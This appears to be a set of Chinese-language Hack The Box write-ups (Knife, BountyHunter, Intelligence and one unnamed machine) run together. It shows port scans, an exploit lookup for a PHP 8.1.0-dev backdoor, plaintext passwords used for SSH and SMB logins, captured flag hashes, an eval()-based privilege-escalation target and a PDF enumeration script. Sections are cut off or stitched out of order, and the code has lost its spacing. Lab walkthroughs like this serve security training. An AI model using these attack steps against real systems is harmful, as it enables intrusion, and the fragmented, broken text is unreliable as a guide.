Nmap scan report for 10.10.10.242 Host is up (0.36s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
漏洞利用
得到PHP版本信息
1 2 3 4 5 6 7
curl -I http://10.10.10.242/
HTTP/1.1 200 OK Date: Thu, 05 Aug 2021 05:54:34 GMT Server: Apache/2.4.41 (Ubuntu) X-Powered-By: PHP/8.1.0-dev Content-Type: text/html; charset=UTF-8
查询得到相关漏洞
1 2 3 4 5 6 7 8 9
searchsploit php 8.1 dev
----------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------- --------------------------------- PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py ----------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife
Nmap scan report for 10.10.10.245 Host is up (0.28s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.10.11.100 Host is up (0.25s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
// TODO -> Implement login system with the database. $dbserver = "localhost"; $dbname = "bounty"; $dbusername = "admin"; $dbpassword = "m19RoAU0hP41A1sTsq6K"; $testuser = "test";
登入SSH服务
1 2
ssh development@10.10.11.100 m19RoAU0hP41A1sTsq6K
1 2 3
cat /home/development/user.txt
96248cc10e05f03e3b63eb59adfd9d4c
权限提升
1 2 3 4 5 6 7 8 9 10 11
cat /home/development/contract.txt
Hey team,
I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.
This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.
I set up the permissions for you to test this. Good luck.
-- John
查看sudo权限
1 2 3 4 5 6 7 8
sudo -l
Matching Defaults entries for development on bountyhunter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User development may run the following commands on bountyhunter: (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
def evaluate(ticketFile): #Evaluates a ticket to check for ireggularities. code_line = None for i,x in enumerate(ticketFile.readlines()): if i == 0: if not x.startswith("# Skytrain Inc"): return False continue if i == 1: if not x.startswith("## Ticket to "): return False print(f"Destination: {' '.join(x.strip().split(' ')[3:])}") continue
if x.startswith("__Ticket Code:__"): code_line = i+1 continue
if code_line and i == code_line: if not x.startswith("**"): return False ticketCode = x.replace("**", "").split("+")[0] if int(ticketCode) % 7 == 4: validationNumber = eval(x.replace("**", "")) if validationNumber > 100: return True else: return False return False
def main(): fileName = input("Please enter the path to the ticket file.\n") ticket = load_file(fileName) #DEBUG print(ticket) result = evaluate(ticket) if (result): print("Valid ticket.") else: print("Invalid ticket.") ticket.close
Nmap scan report for 10.10.10.248 Host is up (0.21s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-18 12:54:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
漏洞利用
访问80端口,可以看到主页上有两个PDF的链接
尝试枚举其他PDF
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
#pdf.py import requests req = requests.session() for i inrange(3): for j inrange(1, 13): for k inrange(31): year = str(2020 + i) month = ("0" + str(j)) iflen(str(j)) == 1elsestr(j) day = ("0" + str(k)) iflen(str(k)) == 1elsestr(k) url = "http://10.10.10.248/documents/" + year + "-" + month + "-" + day + "-upload.pdf" res = req.get(url) if res.status_code == 200: filename = year + "-" + month + "-" + day + "-upload.pdf" print(filename) file = open(filename, "wb") file.write(res.content)
获取PDF的用户名
1 2 3 4 5 6 7 8
#pdf.sh filelist=`ls *.pdf` filenum=`ls *.pdf|wc -l` for ((i=1;i<=$filenum;i++)) do filename[${i}]=`ls *.pdf| sed -n ${i}p` echo `exiftool ${filename[${i}]} | grep Creator | awk -F \ '{print \$3}'` >> user done
Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC IT READ ONLY NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share Users READ ONLY
获得user.txt
1 2 3
smbclient //10.10.10.248/users -U Tiffany.Molina NewIntelligenceCorpUser9876 cd Tiffany.Molina\Desktop\ get user.txt
1 2 3
cat user.txt
bbfd0948d53d769c6ec2fcc02181fa7b
权限提升
获取powershell脚本
1 2
smbclient //10.10.10.248/IT -U Tiffany.Molina NewIntelligenceCorpUser9876 get downdetector.ps1
1 2 3 4 5 6 7 8 9 10 11 12
cat downdetector.ps1
# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down" } } catch {} }